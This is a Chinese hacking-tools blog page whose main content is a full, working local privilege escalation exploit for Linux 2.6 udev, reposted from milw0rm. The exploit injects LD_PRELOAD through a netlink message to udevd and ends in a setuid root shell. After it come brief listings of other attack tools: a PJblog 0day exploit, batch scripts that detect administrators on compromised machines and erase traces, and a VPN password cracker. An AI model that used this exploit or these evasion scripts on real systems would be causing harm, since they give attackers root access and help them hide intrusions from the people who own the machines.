分类 ‘工具收集’ 下的日志

Linux Kernel 2.6 UDEV Local Privilege Escalation Exploit

# 鬼仔注:相关日志 Linux爆本地提权漏洞 请立即更新udev程序udev,linux有史以来最危险的本地安全漏洞

# milw0rm.com [2009-04-20]

#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang

cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

main(int argc, char **argv) {
        char sysfspath[SHORT_STRING];
        char subsystem[SHORT_STRING];
        char event[SHORT_STRING];
        char major[SHORT_STRING];
        char minor[SHORT_STRING];

        sprintf(event, "add");
        sprintf(subsystem, "block");
        sprintf(sysfspath, "/dev/foo");
        sprintf(major, "8");
        sprintf(minor, "1");

        memset(&address, 0, sizeof(address));
        address.nl_family = AF_NETLINK;
        address.nl_pid = atoi(argv[1]);
        address.nl_groups = 0;

        msg.msg_name = (void*)&address;
        msg.msg_namelen = sizeof(address);
        msg.msg_iov = &iovector;
        msg.msg_iovlen = 1;

        socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
        bind(socket_fd, (struct sockaddr *) &address, sizeof(address));

        char message[LONG_STRING];
        char *mp;

        mp = message;
        mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
        mp += sprintf(mp, "ACTION=%s", event) +1;
        mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
        mp += sprintf(mp, "MAJOR=%s", major) +1;
        mp += sprintf(mp, "MINOR=%s", minor) +1;
        mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
        mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;

        iovector.iov_base = (void*)message;
        iovector.iov_len = (int)(mp-message);

        char *buf;
        int buflen;
        buf = (char *) &msg;
        buflen = (int)(mp-message);

        sendmsg(socket_fd, &msg, 0);

        close(socket_fd);

	sleep(10);
	execl("/tmp/suid", "suid", (void*)0);
}

_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{
 setgid(0);
 setuid(0);
 unsetenv("LD_PRELOAD");
 execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
}

_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
       setgid(0); setuid(0);
       execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
Tags: , , , , ,

PJblog V3.0 0day Vbs版漏洞利用工具

来源:WEB安全手册

感谢雨中风铃的投递

漏洞具体细节请看http://0kee.com/read.php?tid-908.html,我的电脑上没有安装php,就编写了一个Vbs版漏洞利用工具,具体代码如下:
阅读全文 »

Tags: , , ,

幻境网盾3.40 (skiller的替代品)

作者:cnqing

3.40 停止下载,新版本为3.50 测试版

将近一年没有更新过Skiller了,名字也换了下 “幻境网盾”。此版本未打包winpcap抓包驱动,需要自己下载安装。

下载地址:http://www.cncert.net/up_files/soft/skiller350.rar.mdb
(下载将后缀改为rar)
winpcap在这里:http://www.winpcap.org/install/default.htm

3.50 更新内容

1.增加手动添加IP功能
2.修正IP冲突

3.40 更新内容

1.增加ARP防护功能
2.增加自动模式,ping大于阙值是启动,小于时停止.
3.更新界面
4.增加部分网管软件检测(彩影)
5.修正上个版本的众多BUG

放图:
阅读全文 »

Tags: ,

一个监视终端登陆的批处理文件

作者:Netpatch
来源:WEB安全手册

主要用于在登陆肉鸡终端的时候,放哨用的。一旦有人连接终端端口(默认端口3389),就发声报警,并对对方是否登陆进行监控。

如果有人登陆终端成功,就自动把指定目录的工具(exe后缀的)循环进行“结束 程序进程”操作,整目录进行删除,然后注销会话并删除自身(不留任何文件)。
阅读全文 »

Tags: , ,

HTTP包装器

作者:cnqing

下载地址:httpwrap.rar

截图:
阅读全文 »

Tags:

当渗透中实时检测管理员的 bat

作者:逗号

– -! 来了TOOLS 这么久还没写过东西现在给大家贡献点东西
当你在渗透中挂机嗅探的时候,如果管理员上来发现就不好了所以有了这个bat 的用处
检测管理员上线注销自已的 bat
copy 保存为 xx.bat
阅读全文 »

Tags: , , , , , ,

php导出oracle库的php代码

作者:lcx

<?php
$conn=OCILogon("用户名","密码","(DESCRIPTION=(ADDRESS=(PROTOCOL =TCP)(HOST=IP)(PORT = 1521))(CONNECT_DATA =(SID=lcx)))");
 阅读全文 »
Tags: ,

pptp & vpn 破解工具

作者:x90x20

有需求,网上找不到相关工具,所以自己写了个.没有提供给用户自行定义线程数量的接口.本程序不直接读取IO文件中的密码,而是将每个要用到的密码 文件映射到内存操作,所以同时最大只支持32个线程,密码文件不宜过大,从性能上来说越小越好,以免过多的造成内存碎片,降低机器的性能.很抱歉,因为写 它的时候我并没有打算去写个内存池来优化它的内存操作.我仅仅是做个测试而已,没有考虑会利用它来做些什么.
阅读全文 »

Tags: , ,